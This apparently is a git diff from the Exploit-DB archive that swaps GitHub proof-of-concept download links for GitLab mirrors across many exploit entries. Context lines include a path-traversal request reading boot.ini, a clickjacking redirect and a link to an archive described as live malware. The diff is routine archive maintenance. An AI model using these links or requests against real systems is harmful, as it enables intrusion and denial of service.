a59ca4d9f..9d0b71260 100644 --- a/exploits/multiple/dos/46096.txt +++ b/exploits/multiple/dos/46096.txt @@ -106,4 +106,4 @@ The bug was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1537 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46096.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46096.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46332.txt b/exploits/multiple/dos/46332.txt index 33211b0ee..a75d32762 100644 --- a/exploits/multiple/dos/46332.txt +++ b/exploits/multiple/dos/46332.txt @@ -222,4 +222,4 @@ PoCs for Skia and Chrome are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46332.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46472.txt b/exploits/multiple/dos/46472.txt index 8e5554eb4..f3f294abe 100644 --- a/exploits/multiple/dos/46472.txt +++ b/exploits/multiple/dos/46472.txt @@ -148,4 +148,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46472.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46472.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46473.txt b/exploits/multiple/dos/46473.txt index 55832f90f..ec3124940 100644 --- a/exploits/multiple/dos/46473.txt +++ b/exploits/multiple/dos/46473.txt @@ -166,4 +166,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46473.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46473.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46474.txt b/exploits/multiple/dos/46474.txt index a08b45325..db0d59d0d 100644 --- a/exploits/multiple/dos/46474.txt +++ b/exploits/multiple/dos/46474.txt @@ -159,4 +159,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46474.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46474.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46475.txt b/exploits/multiple/dos/46475.txt index 609150140..7b608a8f9 100644 --- a/exploits/multiple/dos/46475.txt +++ b/exploits/multiple/dos/46475.txt @@ -50,4 +50,4 @@ Note that this is *not* a renderer bug; it's a browser process bug that's reacha Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46475.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46475.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46476.txt b/exploits/multiple/dos/46476.txt index 8795af1ff..e2c20dbb8 100644 --- a/exploits/multiple/dos/46476.txt +++ b/exploits/multiple/dos/46476.txt @@ -57,4 +57,4 @@ Attached is a ZIP archive containing up to three input samples per each crash, t Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46476.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46476.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46722.txt b/exploits/multiple/dos/46722.txt index 7cc34735f..3a365c1ee 100644 --- a/exploits/multiple/dos/46722.txt +++ b/exploits/multiple/dos/46722.txt @@ -96,4 +96,4 @@ In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in thr Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46722.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46722.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46723.txt b/exploits/multiple/dos/46723.txt index e5d2e05a6..fda9ac78f 100644 --- a/exploits/multiple/dos/46723.txt +++ b/exploits/multiple/dos/46723.txt @@ -112,4 +112,4 @@ We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46723.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46723.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47001.txt b/exploits/multiple/dos/47001.txt index d74e6d638..41a8a86da 100644 --- a/exploits/multiple/dos/47001.txt +++ b/exploits/multiple/dos/47001.txt @@ -104,4 +104,4 @@ UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk= Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47001.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47001.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47002.txt b/exploits/multiple/dos/47002.txt index 1ed5bd18e..3b7b0ef7f 100644 --- a/exploits/multiple/dos/47002.txt +++ b/exploits/multiple/dos/47002.txt @@ -98,4 +98,4 @@ competencies of X41. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47002.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47002.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47003.txt b/exploits/multiple/dos/47003.txt index 1bae59925..47ae6c6d0 100644 --- a/exploits/multiple/dos/47003.txt +++ b/exploits/multiple/dos/47003.txt @@ -78,4 +78,4 @@ competencies of X41. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47003.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47003.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47004.txt b/exploits/multiple/dos/47004.txt index 94586657d..dba188df2 100644 --- a/exploits/multiple/dos/47004.txt +++ b/exploits/multiple/dos/47004.txt @@ -90,4 +90,4 @@ competencies of X41. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47004.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47004.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47189.txt b/exploits/multiple/dos/47189.txt index ccbcd3205..0acd52cd3 100644 --- a/exploits/multiple/dos/47189.txt +++ b/exploits/multiple/dos/47189.txt @@ -19,4 +19,4 @@ This approach, however, requires that all libraries loaded in the target process Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47189.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47189.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47192.txt b/exploits/multiple/dos/47192.txt index ed7b3455d..38f76538d 100644 --- a/exploits/multiple/dos/47192.txt +++ b/exploits/multiple/dos/47192.txt @@ -15,4 +15,4 @@ python3 sendMessage.py Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47192.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47192.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47193.txt b/exploits/multiple/dos/47193.txt index 14cc0a4b4..476705f99 100644 --- a/exploits/multiple/dos/47193.txt +++ b/exploits/multiple/dos/47193.txt @@ -15,4 +15,4 @@ python3 sendMessage.py Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47193.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47193.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47194.txt b/exploits/multiple/dos/47194.txt index b51889b3b..c3f8e65d1 100644 --- a/exploits/multiple/dos/47194.txt +++ b/exploits/multiple/dos/47194.txt @@ -36,4 +36,4 @@ This PoC works similarly to the one above, but it encodes the string by using th Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47194.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47194.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47257.txt b/exploits/multiple/dos/47257.txt index 07a2fcdc4..2b4f00cd5 100644 --- a/exploits/multiple/dos/47257.txt +++ b/exploits/multiple/dos/47257.txt @@ -16,4 +16,4 @@ leaked memory will be printed to the screen. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47257.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47257.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47450.txt b/exploits/multiple/dos/47450.txt index 0b795b851..ab9ba1f6c 100644 --- a/exploits/multiple/dos/47450.txt +++ b/exploits/multiple/dos/47450.txt @@ -147,4 +147,4 @@ Sergei Glazunov of Google Project Zero Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47450.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47450.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47453.txt b/exploits/multiple/dos/47453.txt index f8f66fbb5..68ea3b72a 100644 --- a/exploits/multiple/dos/47453.txt +++ b/exploits/multiple/dos/47453.txt @@ -64,4 +64,4 @@ Sergei Glazunov of Google Project Zero Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47453.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47453.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47552.txt b/exploits/multiple/dos/47552.txt index 543d9e581..83fb32fb1 100644 --- a/exploits/multiple/dos/47552.txt +++ b/exploits/multiple/dos/47552.txt @@ -125,4 +125,4 @@ Sergei Glazunov of Google Project Zero Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47552.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47552.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47608.txt b/exploits/multiple/dos/47608.txt index d6fcaed19..aa2923f96 100644 --- a/exploits/multiple/dos/47608.txt +++ b/exploits/multiple/dos/47608.txt @@ -91,4 +91,4 @@ keys and values. This should be fine as all the other fields are implementation Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47608.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47608.zip \ No newline at end of file diff --git a/exploits/multiple/dos/47970.txt b/exploits/multiple/dos/47970.txt index bd043b008..7ce7edd46 100644 --- a/exploits/multiple/dos/47970.txt +++ b/exploits/multiple/dos/47970.txt @@ -52,4 +52,4 @@ The attached archive contains the original image and the mutated one causing the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47970.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47970.zip \ No newline at end of file diff --git a/exploits/multiple/dos/48035.txt b/exploits/multiple/dos/48035.txt index 1fc3e178e..72b9d83a0 100644 --- a/exploits/multiple/dos/48035.txt +++ b/exploits/multiple/dos/48035.txt @@ -8,4 +8,4 @@ I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48035.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48035.zip \ No newline at end of file diff --git a/exploits/multiple/dos/5229.txt b/exploits/multiple/dos/5229.txt index 019441267..102e8fb50 100644 --- a/exploits/multiple/dos/5229.txt +++ b/exploits/multiple/dos/5229.txt @@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500. http://aluigi.org/poc/asgulo.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5229.zip (2008-asgulo.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5229.zip (2008-asgulo.zip) A] http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini diff --git a/exploits/multiple/dos/6029.txt b/exploits/multiple/dos/6029.txt index 6fa51660b..4bff53a8d 100644 --- a/exploits/multiple/dos/6029.txt +++ b/exploits/multiple/dos/6029.txt @@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected It is unknown at this time whether code execution is possible... """ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6029.zip (2008-www.NoiseBridge.net.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6029.zip (2008-www.NoiseBridge.net.zip) # milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/exploits/multiple/dos/6174.txt b/exploits/multiple/dos/6174.txt index 8e257c657..359490ab7 100644 --- a/exploits/multiple/dos/6174.txt +++ b/exploits/multiple/dos/6174.txt @@ -17,6 +17,6 @@ your scanner hanging, woops. -- kokanin -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6174.zip (2008-snot.zip.bla) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6174.zip (2008-snot.zip.bla) # milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/exploits/multiple/dos/6237.txt b/exploits/multiple/dos/6237.txt index a596baf63..3ca4ca6ce 100644 --- a/exploits/multiple/dos/6237.txt +++ b/exploits/multiple/dos/6237.txt @@ -1,5 +1,5 @@ NULL pointer in Ventrilo 3.0.2 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6237.zip (2008-ventrilobotomy.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6237.zip (2008-ventrilobotomy.zip) # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/exploits/multiple/dos/6252.txt b/exploits/multiple/dos/6252.txt index 1fcebf92a..5bdc8c263 100644 --- a/exploits/multiple/dos/6252.txt +++ b/exploits/multiple/dos/6252.txt @@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com) http://www.orange-bat.com/adv/2008/vlc.dos.tta -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6252.tta (2008-vlc.dos.tta) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6252.tta (2008-vlc.dos.tta) - - PGP - diff --git a/exploits/multiple/dos/6622.txt b/exploits/multiple/dos/6622.txt index 9f0ccf779..eff39980d 100644 --- a/exploits/multiple/dos/6622.txt +++ b/exploits/multiple/dos/6622.txt @@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture: Err file wtap.c: line 620 (wtap_read): assertion failed: (wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6622.ncf (2008-wireshark.ncf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6622.ncf (2008-wireshark.ncf) # milw0rm.com [2008-09-29] \ No newline at end of file diff --git a/exploits/multiple/dos/8285.txt b/exploits/multiple/dos/8285.txt index 9dcb9154b..8ef0d5908 100644 --- a/exploits/multiple/dos/8285.txt +++ b/exploits/multiple/dos/8285.txt @@ -2,6 +2,6 @@ // k`sOSe - works both in windows and linux -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8285.tar.gz (2009-ffox-poc.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8285.tar.gz (2009-ffox-poc.tar.gz) # milw0rm.com [2009-03-25] \ No newline at end of file diff --git a/exploits/multiple/dos/8826.txt b/exploits/multiple/dos/8826.txt index 19d318fbe..361a2bba2 100644 --- a/exploits/multiple/dos/8826.txt +++ b/exploits/multiple/dos/8826.txt @@ -1,5 +1,5 @@ Acrobat <= 9.1.1 Stack Overflow Crashy PoC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8826.pdf (2009-crashy_the_clown.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8826.pdf (2009-crashy_the_clown.pdf) # milw0rm.com [2009-05-29] \ No newline at end of file diff --git a/exploits/multiple/dos/9731.txt b/exploits/multiple/dos/9731.txt index adf668682..2cdfed5ef 100644 --- a/exploits/multiple/dos/9731.txt +++ b/exploits/multiple/dos/9731.txt @@ -20,5 +20,5 @@ snort-2.8.4 snort-2.8.5.beta* link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html -poc: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2009-snort-unified1_bug.tar.gz +poc: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2009-snort-unified1_bug.tar.gz # milw0rm.com [2009-09-21] \ No newline at end of file diff --git a/exploits/multiple/dos/9987.py b/exploits/multiple/dos/9987.py index d927f3f82..73d6cdc49 100755 --- a/exploits/multiple/dos/9987.py +++ b/exploits/multiple/dos/9987.py @@ -66,4 +66,4 @@ def main(argc , argv): if (__name__ == "__main__"): - sys.exit(main(len(sys.argv), sys.argv)) + sys.exit(main(len(sys.argv), sys.argv)) \ No newline at end of file diff --git a/exploits/multiple/local/10207.txt b/exploits/multiple/local/10207.txt index 2d21d2e03..feff86de7 100644 --- a/exploits/multiple/local/10207.txt +++ b/exploits/multiple/local/10207.txt @@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401 VMWare ESX Server 3.5 ESX350-200910401 VMWare ACE 2.5.3 Build 185404 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file diff --git a/exploits/multiple/local/10326.txt b/exploits/multiple/local/10326.txt index ccd6baae9..f662b016b 100644 --- a/exploits/multiple/local/10326.txt +++ b/exploits/multiple/local/10326.txt @@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56 Ghostscript Ghostscript 8.54 Ghostscript Ghostscript 8.15 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file diff --git a/exploits/multiple/local/19547.txt b/exploits/multiple/local/19547.txt index 5db527d69..a0222567b 100644 --- a/exploits/multiple/local/19547.txt +++ b/exploits/multiple/local/19547.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19547.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19547.tgz \ No newline at end of file diff --git a/exploits/multiple/local/21117.txt b/exploits/multiple/local/21117.txt index 0df2793fa..7d2fbfc72 100644 --- a/exploits/multiple/local/21117.txt +++ b/exploits/multiple/local/21117.txt @@ -8,4 +8,4 @@ These problems could be exploited to allow a local attacker to execute arbitrary This situation could be leveraged by the attacker to gain root privileges on the host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21117.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21117.tar \ No newline at end of file diff --git a/exploits/multiple/local/28817.txt b/exploits/multiple/local/28817.txt index 7ce0d139a..8287b65ed 100644 --- a/exploits/multiple/local/28817.txt +++ b/exploits/multiple/local/28817.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to delete arbitrary files within the context Versions 3.6.cpu, 3.6.cpj are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28817.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28817.zip \ No newline at end of file diff --git a/exploits/multiple/local/30039.txt b/exploits/multiple/local/30039.txt index 3d619a3d4..c29d6b4b6 100644 --- a/exploits/multiple/local/30039.txt +++ b/exploits/multiple/local/30039.txt @@ -11,6 +11,6 @@ The following applications are vulnerable to this issue: Other applications and versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30039-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30039-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30039-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30039-2.zip \ No newline at end of file diff --git a/exploits/multiple/local/30970.txt b/exploits/multiple/local/30970.txt index b5c30b4e2..11656c212 100644 --- a/exploits/multiple/local/30970.txt +++ b/exploits/multiple/local/30970.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow local attackers to execute arbitrary code in t Versions prior to White_Dune 0.29beta795 are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30970.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30970.zip \ No newline at end of file diff --git a/exploits/multiple/local/32055.txt b/exploits/multiple/local/32055.txt index 011425a4f..02f943e31 100644 --- a/exploits/multiple/local/32055.txt +++ b/exploits/multiple/local/32055.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue can allow an attacker to execute arbitrary co Netrw 127 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32055.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32055.zip \ No newline at end of file diff --git a/exploits/multiple/local/32501.txt b/exploits/multiple/local/32501.txt index de5b19ab9..db42895e2 100644 --- a/exploits/multiple/local/32501.txt +++ b/exploits/multiple/local/32501.txt @@ -12,4 +12,4 @@ MIFARE Classic is prone to multiple security weaknesses: Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32501.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32501.tgz \ No newline at end of file diff --git a/exploits/multiple/local/39595.txt b/exploits/multiple/local/39595.txt index 3675e6c47..20b2b64ae 100644 --- a/exploits/multiple/local/39595.txt +++ b/exploits/multiple/local/39595.txt @@ -104,4 +104,4 @@ Note that the race window is still quite tight so you may have to try a few time Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39595.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39595.zip \ No newline at end of file diff --git a/exploits/multiple/local/40931.txt b/exploits/multiple/local/40931.txt index 0cfda7510..886c3b046 100644 --- a/exploits/multiple/local/40931.txt +++ b/exploits/multiple/local/40931.txt @@ -576,4 +576,4 @@ Shell: Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40931.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40931.zip \ No newline at end of file diff --git a/exploits/multiple/local/41021.md b/exploits/multiple/local/41021.md index 5f4843c00..07bfe6044 100644 --- a/exploits/multiple/local/41021.md +++ b/exploits/multiple/local/41021.md @@ -1,5 +1,5 @@ For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip) -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41021.zip +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41021.zip ## Overview diff --git a/exploits/multiple/local/41870.txt b/exploits/multiple/local/41870.txt index 9c5cede74..5ea90ab87 100644 --- a/exploits/multiple/local/41870.txt +++ b/exploits/multiple/local/41870.txt @@ -218,4 +218,4 @@ Proof of Concept: privesc_poc.tar.gz ################################################################################ Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41870.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip \ No newline at end of file diff --git a/exploits/multiple/local/41904.txt b/exploits/multiple/local/41904.txt index edbb41a36..f8889c359 100644 --- a/exploits/multiple/local/41904.txt +++ b/exploits/multiple/local/41904.txt @@ -315,4 +315,4 @@ the VM to restore network connectivity. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41904.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41904.zip \ No newline at end of file diff --git a/exploits/multiple/local/42407.txt b/exploits/multiple/local/42407.txt index aa7273378..28b22c6db 100644 --- a/exploits/multiple/local/42407.txt +++ b/exploits/multiple/local/42407.txt @@ -77,4 +77,4 @@ The exploit isn't hugely reliable - the race condition needs quite exact timing Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42407.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42407.zip \ No newline at end of file diff --git a/exploits/multiple/local/43887.txt b/exploits/multiple/local/43887.txt index c678aebac..163c0f603 100644 --- a/exploits/multiple/local/43887.txt +++ b/exploits/multiple/local/43887.txt @@ -71,7 +71,7 @@ Patches that fix these vulnerabilities can be obtained from the ICU project in [ >> References: -[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43887.zip) +[1] https://github.com/pedrib/PoC/raw/master/generic/i-c-u-fail.7z (EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43887.zip) [2] https://www.kb.cert.org/vuls/id/602540 [3] http://bugs.icu-project.org/trac/changeset/37080 [4] http://bugs.icu-project.org/trac/changeset/37162 diff --git a/exploits/multiple/local/48187.txt b/exploits/multiple/local/48187.txt index 63bf7b206..f887bafee 100644 --- a/exploits/multiple/local/48187.txt +++ b/exploits/multiple/local/48187.txt @@ -1,3 +1,3 @@ So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years. -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48187.bsp \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48187.bsp \ No newline at end of file diff --git a/exploits/multiple/local/48231.md b/exploits/multiple/local/48231.md index f1a07a8f8..4a80ba15c 100644 --- a/exploits/multiple/local/48231.md +++ b/exploits/multiple/local/48231.md @@ -13,4 +13,4 @@ You can read more about this vulnerability on our blog: [https://blog.doyensec.c - Open `test.py` in VScode -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48231.zip \ No newline at end of file diff --git a/exploits/multiple/remote/13787.txt b/exploits/multiple/remote/13787.txt index d2f50d372..f6bd3f5be 100644 --- a/exploits/multiple/remote/13787.txt +++ b/exploits/multiple/remote/13787.txt @@ -9,4 +9,4 @@ NOTE: This was taken out of live malware and was not modified. BEWARE. By visiting the following link, you agree that you are responsible for any damages that occur. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) \ No newline at end of file diff --git a/exploits/multiple/remote/14387.html b/exploits/multiple/remote/14387.html index 29f09448a..ce750864f 100644 --- a/exploits/multiple/remote/14387.html +++ b/exploits/multiple/remote/14387.html @@ -37,8 +37,4 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> <p align="center"> </p> <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p> <p align="center">http://Securitylab.ir/Advisory</p> -</html> - - - - +</html> \ No newline at end of file diff --git a/exploits/multiple/remote/1791.patch b/exploits/multiple/remote/1791.patch index cc894415a..9cfbb00e7 100644 --- a/exploits/multiple/remote/1791.patch +++ b/exploits/multiple/remote/1791.patch @@ -16,4 +16,4 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); } E-DB Note: -Compiled: 